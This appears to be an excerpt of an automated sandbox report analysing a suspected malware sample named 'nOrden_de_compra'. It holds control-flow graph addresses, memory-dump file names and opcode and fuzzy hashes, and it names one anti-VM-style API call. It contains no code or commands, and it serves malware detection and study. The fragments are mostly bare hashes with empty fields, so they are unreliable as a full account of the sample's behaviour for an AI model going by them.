                                          • Instruction ID: 1d9530b50c264d834aa8bad6f104e87680db1fb95cd89ab107b056cafb6bee26
                                          • Opcode Fuzzy Hash: 4a06e12862a601ab44e0c8a9734cb8de1f4d40b8283c9adb4370f27ad9002f26
                                          • Instruction Fuzzy Hash: EF62A074B00215CFDB54EBA8D544BADB7B2EF88314F2495A9D806DB390EB75EC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1502 6b8c1f0-6b8c210 1503 6b8c212-6b8c215 1502->1503 1504 6b8c23e-6b8c241 1503->1504 1505 6b8c217-6b8c239 1503->1505 1506 6b8c259-6b8c25c 1504->1506 1507 6b8c243-6b8c254 1504->1507 1505->1504 1508 6b8c288-6b8c28b 1506->1508 1509 6b8c25e-6b8c283 1506->1509 1507->1506 1511 6b8c2ab-6b8c2ae 1508->1511 1512 6b8c28d-6b8c2a6 1508->1512 1509->1508 1516 6b8c4b3-6b8c4bc 1511->1516 1517 6b8c2b4-6b8c2b7 1511->1517 1512->1511 1518 6b8c32f-6b8c338 1516->1518 1519 6b8c4c2 1516->1519 1521 6b8c2b9-6b8c2dd 1517->1521 1522 6b8c2e2-6b8c2e5 1517->1522 1523 6b8c33e-6b8c342 1518->1523 1524 6b8c587-6b8c5bd 1518->1524 1529 6b8c4c7-6b8c4ca 1519->1529 1521->1522 1526 6b8c2f5-6b8c2f8 1522->1526 1527 6b8c2e7-6b8c2ee 1522->1527 1531 6b8c347-6b8c34a 1523->1531 1552 6b8c5bf-6b8c5c2 1524->1552 1532 6b8c2fa-6b8c2fd 1526->1532 1534 6b8c302-6b8c305 1526->1534 1527->1532 1533 6b8c2f0 1527->1533 1535 6b8c4cc-6b8c4d5 1529->1535 1536 6b8c4e7-6b8c4ea 1529->1536 1537 6b8c34c-6b8c355 1531->1537 1538 6b8c360-6b8c363 1531->1538 1532->1534 1533->1526 1541 6b8c30f-6b8c312 1534->1541 1542 6b8c307-6b8c30c 1534->1542 1535->1524 1543 6b8c4db-6b8c4e2 1535->1543 1544 6b8c4ec-6b8c4f2 1536->1544 1545 6b8c4f7-6b8c4fa 1536->1545 1537->1535 1549 6b8c35b 1537->1549 1550 6b8c370-6b8c373 1538->1550 1551 6b8c365-6b8c36b 1538->1551 1553 6b8c32a-6b8c32d 1541->1553 1554 6b8c314-6b8c325 1541->1554 1542->1541 1543->1536 1544->1545 1546 6b8c4fc-6b8c520 1545->1546 1547 6b8c525-6b8c528 1545->1547 1546->1547 1555 6b8c53a-6b8c53d 1547->1555 1556 6b8c52a-6b8c535 1547->1556 1549->1538 1557 6b8c393-6b8c396 1550->1557 1558 6b8c375-6b8c38e 1550->1558 1551->1550 1559 6b8c5ee-6b8c5f1 1552->1559 1560 6b8c5c4-6b8c5dd 1552->1560 1553->1518 1553->1531 1554->1553 1565 6b8c55d-6b8c560 1555->1565 1566 6b8c53f-6b8c558 1555->1566 1556->1555 1567 6b8c398-6b8c3b1 1557->1567 1568 6b8c3b6-6b8c3b9 1557->1568 1558->1557 1561 6b8c5f3-6b8c60f 1559->1561 1562 6b8c614-6b8c617 1559->1562 1601 
6b8c5e3-6b8c5ed 1560->1601 1602 6b8c677-6b8c683 1560->1602 1561->1562 1574 6b8c619-6b8c623 1562->1574 1575 6b8c624-6b8c627 1562->1575 1570 6b8c56a-6b8c56c 1565->1570 1571 6b8c562-6b8c567 1565->1571 1566->1565 1567->1568 1572 6b8c3bb-6b8c3ca 1568->1572 1573 6b8c3d1-6b8c3d4 1568->1573 1579 6b8c56e 1570->1579 1580 6b8c573-6b8c576 1570->1580 1571->1570 1596 6b8c3cc 1572->1596 1597 6b8c441-6b8c444 1572->1597 1581 6b8c3d6-6b8c3f2 1573->1581 1582 6b8c3f7-6b8c3fa 1573->1582 1585 6b8c629-6b8c642 1575->1585 1586 6b8c647-6b8c64a 1575->1586 1579->1580 1580->1503 1590 6b8c57c-6b8c586 1580->1590 1581->1582 1591 6b8c3fc-6b8c421 1582->1591 1592 6b8c426-6b8c429 1582->1592 1585->1586 1594 6b8c64c-6b8c65a 1586->1594 1595 6b8c665-6b8c667 1586->1595 1591->1592 1603 6b8c42b-6b8c42e 1592->1603 1604 6b8c433-6b8c436 1592->1604 1594->1560 1614 6b8c660 1594->1614 1598 6b8c669 1595->1598 1599 6b8c66e-6b8c671 1595->1599 1596->1573 1613 6b8c449-6b8c44c 1597->1613 1598->1599 1599->1552 1599->1602 1609 6b8c689-6b8c692 1602->1609 1610 6b8c823-6b8c82d 1602->1610 1603->1604 1604->1537 1612 6b8c43c-6b8c43f 1604->1612 1615 6b8c698-6b8c6b8 1609->1615 1616 6b8c82e-6b8c83c 1609->1616 1612->1597 1612->1613 1618 6b8c4ae-6b8c4b1 1613->1618 1619 6b8c44e-6b8c4a9 1613->1619 1614->1595 1635 6b8c6be-6b8c6c7 1615->1635 1636 6b8c811-6b8c81d 1615->1636 1626 6b8c83e-6b8c866 1616->1626 1627 6b8c7d3-6b8c7d5 1616->1627 1618->1516 1618->1529 1619->1618 1628 6b8c868-6b8c86b 1626->1628 1630 6b8c7e3 1627->1630 1631 6b8c7d7-6b8c7e1 1627->1631 1633 6b8c871-6b8c87f 1628->1633 1634 6b8ca27-6b8ca2a 1628->1634 1637 6b8c7e8-6b8c7ea 1630->1637 1631->1637 1644 6b8c886-6b8c888 1633->1644 1638 6b8ca2c-6b8ca48 1634->1638 1639 6b8ca4d-6b8ca4f 1634->1639 1635->1616 1640 6b8c6cd-6b8c6fc call 6b865d8 1635->1640 1636->1609 1636->1610 1641 6b8c7ec-6b8c7f8 1637->1641 1642 6b8c7ff-6b8c80b 1637->1642 1638->1639 1645 6b8ca51 1639->1645 1646 6b8ca56-6b8ca59 1639->1646 1664 6b8c73e-6b8c754 1640->1664 1665 6b8c6fe-6b8c736 1640->1665 1641->1642 
1642->1635 1642->1636 1649 6b8c88a-6b8c88d 1644->1649 1650 6b8c89f-6b8c8c9 1644->1650 1645->1646 1646->1628 1651 6b8ca5f-6b8ca68 1646->1651 1649->1651 1662 6b8ca1c-6b8ca26 1650->1662 1663 6b8c8cf-6b8c8d8 1650->1663 1667 6b8c8de-6b8c9ed call 6b865d8 1663->1667 1668 6b8c9f5-6b8ca1a 1663->1668 1671 6b8c772-6b8c788 1664->1671 1672 6b8c756-6b8c76a 1664->1672 1665->1664 1667->1663 1711 6b8c9f3 1667->1711 1668->1651 1680 6b8c78a-6b8c79e 1671->1680 1681 6b8c7a6-6b8c7b9 1671->1681 1672->1671 1680->1681 1687 6b8c7bb-6b8c7c5 1681->1687 1688 6b8c7c7 1681->1688 1691 6b8c7cc-6b8c7ce 1687->1691 1688->1691 1691->1642 1692 6b8c7d0 1691->1692 1692->1627 1711->1662
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 240d7ba74366c4dd5ea625cd098cc9c137c060d1a7a47a0fe63efc56409d800a
                                          • Instruction ID: f7545bc5e9915c85b52389185a228daa4a19be49153416c5ce52d9652f0a133a
                                          • Opcode Fuzzy Hash: 240d7ba74366c4dd5ea625cd098cc9c137c060d1a7a47a0fe63efc56409d800a
                                          • Instruction Fuzzy Hash: 673293B4B002158FDF54EB69E890BAEBBB2FB88310F109569D505EB345DB35DC42CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9c2546b32d1f590ad546aa6561def9d4186ba66aca5fa1e082794031ba842ba
                                          • Instruction ID: 2b62bddc8d1fef4934124c143a846120248de6d61ad60529714ab856ad100a02
                                          • Opcode Fuzzy Hash: a9c2546b32d1f590ad546aa6561def9d4186ba66aca5fa1e082794031ba842ba
                                          • Instruction Fuzzy Hash: AA2251B0E102098FEF64EBB8D5907AEBBB2FB85310F249565E405EB391DA35DC81CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2437 6b83090-6b830b1 2438 6b830b3-6b830b6 2437->2438 2439 6b830b8-6b830d7 2438->2439 2440 6b830dc-6b830df 2438->2440 2439->2440 2441 6b83894-6b83896 2440->2441 2442 6b830e5-6b83104 2440->2442 2444 6b83898 2441->2444 2445 6b8389d-6b838a0 2441->2445 2450 6b8311d-6b83127 2442->2450 2451 6b83106-6b83109 2442->2451 2444->2445 2445->2438 2446 6b838a6-6b838af 2445->2446 2455 6b8312d-6b8313c 2450->2455 2451->2450 2452 6b8310b-6b8311b 2451->2452 2452->2455 2565 6b8313e call 6b838b9 2455->2565 2566 6b8313e call 6b838c0 2455->2566 2456 6b83143-6b83145 2457 6b83152-6b8342f 2456->2457 2458 6b83147-6b8314d 2456->2458 2479 6b83435-6b834e4 2457->2479 2480 6b83886-6b83893 2457->2480 2458->2446 2489 6b8350d 2479->2489 2490 6b834e6-6b8350b 2479->2490 2491 6b83516-6b83526 2489->2491 2490->2491 2494 6b8352c-6b8354b 2491->2494 2495 6b8386d-6b83879 2491->2495 2494->2495 2498 6b83551-6b8355b 2494->2498 2495->2479 2496 6b8387f 2495->2496 2496->2480 2498->2495 2499 6b83561-6b8356c 2498->2499 2499->2495 2500 6b83572-6b83648 2499->2500 2512 6b8364a-6b8364c 2500->2512 2513 6b83656-6b83686 2500->2513 2512->2513 2517 6b83688-6b8368a 2513->2517 2518 6b83694-6b836a0 2513->2518 2517->2518 2519 6b836a2-6b836a6 2518->2519 2520 6b83706-6b83721 2518->2520 2519->2520 2521 6b836a8-6b836d2 2519->2521 2523 6b8385e-6b83867 2520->2523 2524 6b83727-6b83763 2520->2524 2530 6b836e0-6b836ff 2521->2530 2531 6b836d4-6b836d6 2521->2531 2523->2495 2523->2500 2536 6b83771-6b8377f 2524->2536 2537 6b83765-6b83767 2524->2537 2530->2524 2535 6b83701 2530->2535 2531->2530 2535->2523 2539 6b83781-6b8378c 2536->2539 2540 6b83796-6b837a1 2536->2540 2537->2536 2539->2540 2545 6b8378e 2539->2545 2543 6b837b9-6b837ca 2540->2543 2544 6b837a3-6b837a9 2540->2544 2549 6b837cc-6b837d2 2543->2549 2550 6b837e2-6b837ee 2543->2550 2546 6b837ab 2544->2546 2547 6b837ad-6b837af 2544->2547 2545->2540 2546->2543 2547->2543 2551 6b837d4 2549->2551 2552 6b837d6-6b837d8 2549->2552 
2554 6b837f0-6b837f6 2550->2554 2555 6b83806-6b83857 2550->2555 2551->2550 2552->2550 2556 6b837f8 2554->2556 2557 6b837fa-6b837fc 2554->2557 2555->2523 2556->2555 2557->2555 2565->2456 2566->2456
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45b18d30514bc63606cfa318ac5f2a69b15cece22730b2d1f4cbb476c4995da2
                                          • Instruction ID: 4840790ac2314481335b71d820b39b577d1b102f4f32808f32b61780aebf17f2
                                          • Opcode Fuzzy Hash: 45b18d30514bc63606cfa318ac5f2a69b15cece22730b2d1f4cbb476c4995da2
                                          • Instruction Fuzzy Hash: 7B323D34E1061ACFCB54EBB5C85469DB7B2FFC9300F6096AAD509A7254EF70AD85CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bcf61672bb33ac3440be7ab28666c927b9b66b1043fd4e6e5f3edf4bb090573
                                          • Instruction ID: 22f65f8a5beae2ec4b3720db09747e77d2405fd97074805a9db0e8eea900ff71
                                          • Opcode Fuzzy Hash: 9bcf61672bb33ac3440be7ab28666c927b9b66b1043fd4e6e5f3edf4bb090573
                                          • Instruction Fuzzy Hash: 0D029F70B01216CFDB58EF69D9507AEB7A2FF84304F648569D806AB394DB75EC42CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 249 2cdec10-2cdec18 250 2cdec1a-2cdec1c 249->250 251 2cdebd7-2cdebf0 call 2cdec10 249->251 253 2cdec1e-2cdec2b 250->253 254 2cdebca 250->254 257 2cdebf6-2cdebfa 251->257 255 2cdec2d-2cdec54 253->255 256 2cdec55-2cdec6b 253->256 254->251 282 2cdec6d call 2cdecf8 256->282 283 2cdec6d call 2cdec10 256->283 260 2cdebfc-2cdec01 257->260 261 2cdec03-2cdec06 257->261 262 2cdec09-2cdec0b 260->262 261->262 263 2cdec72-2cdec74 264 2cdec7a-2cdecd9 263->264 265 2cdec76-2cdec79 263->265 272 2cdecdf-2cded6c GlobalMemoryStatusEx 264->272 273 2cdecdb-2cdecde 264->273 277 2cded6e-2cded74 272->277 278 2cded75-2cded9d 272->278 277->278 282->263 283->263
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4531066185.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2cd0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d293b6b4786dcb560467ab0082bb0e6d1195824091e496ca48f8f6abed6633b
                                          • Instruction ID: 3ad6e1e462e2ed7b0ef2374d8f622015f3458bab23f91142381ecc4704a0f50c
                                          • Opcode Fuzzy Hash: 2d293b6b4786dcb560467ab0082bb0e6d1195824091e496ca48f8f6abed6633b
                                          • Instruction Fuzzy Hash: 22518332D047989FCB14EFB9D8043DEBBF5AFC9210F04856AE609AB241DB749841CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 2cdecf8-2cded6c GlobalMemoryStatusEx 286 2cded6e-2cded74 284->286 287 2cded75-2cded9d 284->287 286->287
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 02CDED5F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4531066185.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2cd0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: 204fecea2164ab4dc5c4ebb876877f14390a7c6c0186df4f814d80b01964ca08
                                          • Instruction ID: 8031d2f270f5ee4751dfd3655e2ed3ca2ee0d3d3be5281730ad173f8666913fd
                                          • Opcode Fuzzy Hash: 204fecea2164ab4dc5c4ebb876877f14390a7c6c0186df4f814d80b01964ca08
                                          • Instruction Fuzzy Hash: 8B1112B1C0065A9BDB10DF9AC544B9EFBF4AF48720F10816AD918B7240D778A950CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1242 6b8cfb8-6b8cfd3 1243 6b8cfd5-6b8cfd8 1242->1243 1244 6b8cfda-6b8d01c 1243->1244 1245 6b8d021-6b8d024 1243->1245 1244->1245 1246 6b8d02e-6b8d031 1245->1246 1247 6b8d026-6b8d02b 1245->1247 1248 6b8d4a4-6b8d4b0 1246->1248 1249 6b8d037-6b8d03a 1246->1249 1247->1246 1251 6b8d0fa-6b8d109 1248->1251 1252 6b8d4b6-6b8d7a3 1248->1252 1253 6b8d03c-6b8d058 1249->1253 1254 6b8d05d-6b8d060 1249->1254 1255 6b8d118-6b8d124 1251->1255 1256 6b8d10b-6b8d110 1251->1256 1454 6b8d7a9-6b8d7af 1252->1454 1455 6b8d9ca-6b8d9d4 1252->1455 1253->1254 1258 6b8d0a9-6b8d0ac 1254->1258 1259 6b8d062-6b8d071 1254->1259 1262 6b8d12a-6b8d13c 1255->1262 1263 6b8d9d5-6b8da0e 1255->1263 1256->1255 1264 6b8d0ae-6b8d0f0 1258->1264 1265 6b8d0f5-6b8d0f8 1258->1265 1260 6b8d080-6b8d08c 1259->1260 1261 6b8d073-6b8d078 1259->1261 1260->1263 1269 6b8d092-6b8d0a4 1260->1269 1261->1260 1270 6b8d141-6b8d144 1262->1270 1282 6b8da10-6b8da13 1263->1282 1264->1265 1265->1251 1265->1270 1269->1258 1275 6b8d161-6b8d164 1270->1275 1276 6b8d146-6b8d15c 1270->1276 1278 6b8d1ad-6b8d1b0 1275->1278 1279 6b8d166-6b8d1a8 1275->1279 1276->1275 1287 6b8d1bf-6b8d1c2 1278->1287 1288 6b8d1b2-6b8d1b4 1278->1288 1279->1278 1283 6b8da15-6b8da31 1282->1283 1284 6b8da36-6b8da39 1282->1284 1283->1284 1294 6b8da3b-6b8da67 1284->1294 1295 6b8da6c-6b8da6f 1284->1295 1290 6b8d1d1-6b8d1d4 1287->1290 1291 6b8d1c4-6b8d1c6 1287->1291 1296 6b8d1ba 1288->1296 1297 6b8d35f-6b8d368 1288->1297 1302 6b8d21d-6b8d220 1290->1302 1303 6b8d1d6-6b8d218 1290->1303 1298 6b8d1cc 1291->1298 1299 6b8d4a1 1291->1299 1294->1295 1307 6b8da7e-6b8da80 1295->1307 1308 6b8da71 call 6b8db2d 1295->1308 1296->1287 1300 6b8d36a-6b8d36f 1297->1300 1301 6b8d377-6b8d383 1297->1301 1298->1290 1299->1248 1300->1301 1313 6b8d389-6b8d39d 1301->1313 1314 6b8d494-6b8d499 1301->1314 1315 6b8d269-6b8d26c 1302->1315 1316 6b8d222-6b8d264 1302->1316 1303->1302 1311 6b8da82 1307->1311 1312 6b8da87-6b8da8a 1307->1312 1322 
6b8da77-6b8da79 1308->1322 1311->1312 1312->1282 1323 6b8da8c-6b8da9b 1312->1323 1313->1299 1338 6b8d3a3-6b8d3b5 1313->1338 1314->1299 1318 6b8d26e-6b8d2b0 1315->1318 1319 6b8d2b5-6b8d2b8 1315->1319 1316->1315 1318->1319 1328 6b8d2ba-6b8d2fc 1319->1328 1329 6b8d301-6b8d304 1319->1329 1322->1307 1343 6b8da9d-6b8db00 call 6b865d8 1323->1343 1344 6b8db02-6b8db17 1323->1344 1328->1329 1331 6b8d34d-6b8d34f 1329->1331 1332 6b8d306-6b8d348 1329->1332 1341 6b8d351 1331->1341 1342 6b8d356-6b8d359 1331->1342 1332->1331 1356 6b8d3d9-6b8d3db 1338->1356 1357 6b8d3b7-6b8d3bd 1338->1357 1341->1342 1342->1243 1342->1297 1343->1344 1365 6b8d3e5-6b8d3f1 1356->1365 1363 6b8d3bf 1357->1363 1364 6b8d3c1-6b8d3cd 1357->1364 1369 6b8d3cf-6b8d3d7 1363->1369 1364->1369 1380 6b8d3ff 1365->1380 1381 6b8d3f3-6b8d3fd 1365->1381 1369->1365 1387 6b8d404-6b8d406 1380->1387 1381->1387 1387->1299 1388 6b8d40c-6b8d428 call 6b865d8 1387->1388 1399 6b8d42a-6b8d42f 1388->1399 1400 6b8d437-6b8d443 1388->1400 1399->1400 1400->1314 1402 6b8d445-6b8d492 1400->1402 1402->1299 1456 6b8d7be-6b8d7c7 1454->1456 1457 6b8d7b1-6b8d7b6 1454->1457 1456->1263 1458 6b8d7cd-6b8d7e0 1456->1458 1457->1456 1460 6b8d9ba-6b8d9c4 1458->1460 1461 6b8d7e6-6b8d7ec 1458->1461 1460->1454 1460->1455 1462 6b8d7fb-6b8d804 1461->1462 1463 6b8d7ee-6b8d7f3 1461->1463 1462->1263 1464 6b8d80a-6b8d82b 1462->1464 1463->1462 1467 6b8d83a-6b8d843 1464->1467 1468 6b8d82d-6b8d832 1464->1468 1467->1263 1469 6b8d849-6b8d866 1467->1469 1468->1467 1469->1460 1472 6b8d86c-6b8d872 1469->1472 1472->1263 1473 6b8d878-6b8d891 1472->1473 1475 6b8d9ad-6b8d9b4 1473->1475 1476 6b8d897-6b8d8be 1473->1476 1475->1460 1475->1472 1476->1263 1479 6b8d8c4-6b8d8ce 1476->1479 1479->1263 1480 6b8d8d4-6b8d8eb 1479->1480 1482 6b8d8fa-6b8d915 1480->1482 1483 6b8d8ed-6b8d8f8 1480->1483 1482->1475 1488 6b8d91b-6b8d934 call 6b865d8 1482->1488 1483->1482 1492 6b8d943-6b8d94c 1488->1492 1493 6b8d936-6b8d93b 1488->1493 1492->1263 1494 6b8d952-6b8d9a6 1492->1494 1493->1492 
1494->1475
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9221e8bff612e56abd574a4d4422e89caeaf6fc47181af66e31d188b2749c526
                                          • Instruction ID: 1591802004384a4518dbbfffbb48e50490fc69457b3c0104632ac78baf8d352c
                                          • Opcode Fuzzy Hash: 9221e8bff612e56abd574a4d4422e89caeaf6fc47181af66e31d188b2749c526
                                          • Instruction Fuzzy Hash: B8627D30A0021ACFDB55EB69D980A5EB7B2FF85310B209A6DD1059F399DF75EC46CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1803b0a8e71c4a6cb2523c5a61b119923ca196702c3a4696f57132296ed10dd
                                          • Instruction ID: d04e7bf30828d4bdbd92a2f16912d571d9ffd2767218d05033a53fdbba55db15
                                          • Opcode Fuzzy Hash: b1803b0a8e71c4a6cb2523c5a61b119923ca196702c3a4696f57132296ed10dd
                                          • Instruction Fuzzy Hash: FD026DB0E0020ADFDB64EFA8D480AADB7B1FB85310F1495AAE415EB351DB75EC41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa1df290654943385ffe4e4bbc0dd0c089e69639f3854706299df6e6110e1744
                                          • Instruction ID: 95007950bbaed14a6c3c56c8f284b02a6d1ab73d1068dc3770ac121f51857e87
                                          • Opcode Fuzzy Hash: aa1df290654943385ffe4e4bbc0dd0c089e69639f3854706299df6e6110e1744
                                          • Instruction Fuzzy Hash: 8DE17F70E10216CFDB69EB69D4806AEBBB2FF85300F20956AD505EB344DB75DC46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ceade4e5c494be303a01582862f2d3e2c7ffcaba14616d6e787aa6645a127e8
                                          • Instruction ID: 441fcea9c35a944a983a96b2dd550430fd2826ff4250c588a4159815ba34d554
                                          • Opcode Fuzzy Hash: 0ceade4e5c494be303a01582862f2d3e2c7ffcaba14616d6e787aa6645a127e8
                                          • Instruction Fuzzy Hash: 3B913E70B0021A8FDB54EF69D9507AEB7B2FF89600F1085A9D809EB384EB75DD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2afe8271c85f66d812bae1e62c8e66f17acdfe92c7c1f036f47a07170978e8c
                                          • Instruction ID: 03c79983da8dcaca911c6ad8bdf744bb322f0398296db3a9579fb96ddebcbaa9
                                          • Opcode Fuzzy Hash: e2afe8271c85f66d812bae1e62c8e66f17acdfe92c7c1f036f47a07170978e8c
                                          • Instruction Fuzzy Hash: 4661A3B1F000214FDF54AA6EC854A5FBADBEFC4610B154479D80ADB3A0EEA9DD02CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c270bd9cda8b221b2422d07f07b9df9537c89484b52d85d0eea93aeadb4f4264
                                          • Instruction ID: 9fdf47b3096455516f5e7676c827f1c08d18862e1dc8aab9cc6a65ee4b20a609
                                          • Opcode Fuzzy Hash: c270bd9cda8b221b2422d07f07b9df9537c89484b52d85d0eea93aeadb4f4264
                                          • Instruction Fuzzy Hash: C3812A70B012068FDF54EBA9D4507AEB7E2EF89701F108569D90AEB384EA75DC42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12bad54922db2e9e3f12767bb5a36f21a7f5591b1f9989aeb2f1818a8d402c3e
                                          • Instruction ID: 8710b3131391a51a02cf7300e714f1e848f5a40d4ea1d985886cf3c0e028cbbf
                                          • Opcode Fuzzy Hash: 12bad54922db2e9e3f12767bb5a36f21a7f5591b1f9989aeb2f1818a8d402c3e
                                          • Instruction Fuzzy Hash: 1D916070E1025A8FDF60DF68C85079DBBB1FF89310F208599D549AB385DB71AA85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702adbaae42a295cdfbf94b592dcaa9a8c9ff394357c19f9db84e074d215acb3
                                          • Instruction ID: 9f20aaf9ed06339fb6f8f43706d431b32d2440a1f047cb58866802f507e1c14f
                                          • Opcode Fuzzy Hash: 702adbaae42a295cdfbf94b592dcaa9a8c9ff394357c19f9db84e074d215acb3
                                          • Instruction Fuzzy Hash: BD913C74E1021A8FDF64DF68C840B9DB7B1FF89310F208599D509AB385DB71AA85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd416c52a957e5779442a5ceda64e2cc6f37ef48b16a7666c00dcccf435fae27
                                          • Instruction ID: dbbe60367f7fcf77d1085ad8400352948893f0a179633c6ec0fff45687edb62c
                                          • Opcode Fuzzy Hash: cd416c52a957e5779442a5ceda64e2cc6f37ef48b16a7666c00dcccf435fae27
                                          • Instruction Fuzzy Hash: 26713CB0A002199FDB54EFA9D980AADBBF6FF84350F248569E415EB354DB30EC46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
